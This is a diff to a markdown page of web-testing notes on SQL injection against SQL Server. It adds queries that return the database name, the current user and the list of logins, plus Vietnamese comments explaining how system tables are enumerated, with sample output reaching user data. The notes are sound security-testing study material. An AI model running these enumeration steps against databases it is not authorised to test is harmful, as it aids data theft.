--- a/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.3.Testing_for_SQL_Server.md
+++ b/Web_testing/0.7.Input_Validation_Testing/5.Testing_for_SQL_Injection/5.3.Testing_for_SQL_Server.md
@@ -30,6 +30,12 @@ SUBSTRING('carrot', 4, 2)
 SELECT @@version
 ```
 
+# Database name
+
+```sql
+SELECT DB_NAME()
+```
+
 # Database contents
 
 ```sql
@@ -59,24 +65,38 @@ IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10
 
 ```sql
 -- extract databases names
-$ SELECT name FROM master..sysdatabases -- `..` dùng để chỉ đối tượng trong 1 cơ sở dữ liệu cụ 
+$ SELECT name FROM master..sysdatabases -- `..` dùng để chỉ đối tượng trong 1 cơ sở dữ liệu cụ thể
 [*] Injection
 [*] msdb
 [*] tempdb
 
 -- extract tables from Injection database
-$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
+$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U' -- `U` đại diện cho bảng user
 [*] Profiles
 [*] Roles
 [*] Users
-
+ 
 -- extract columns for the table Users
 $ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
 [*] UserId
 [*] UserName
-
+-- tìm id của bảng `Users` trong `sysobjects`, sau đó tìm tất cả cột có trong bảng `Users` từ `syscolumns`
 -- Finally extract the data
 $ SELECT  UserId, UserName from Users
+```
+
+# Current User
+
+```sql
+SELECT user_name(); 
+SELECT system_user; 
+SELECT user;
+```
+
+# List users
+
+```sql
+SELECT name FROM master..syslogins
 ```
 
 
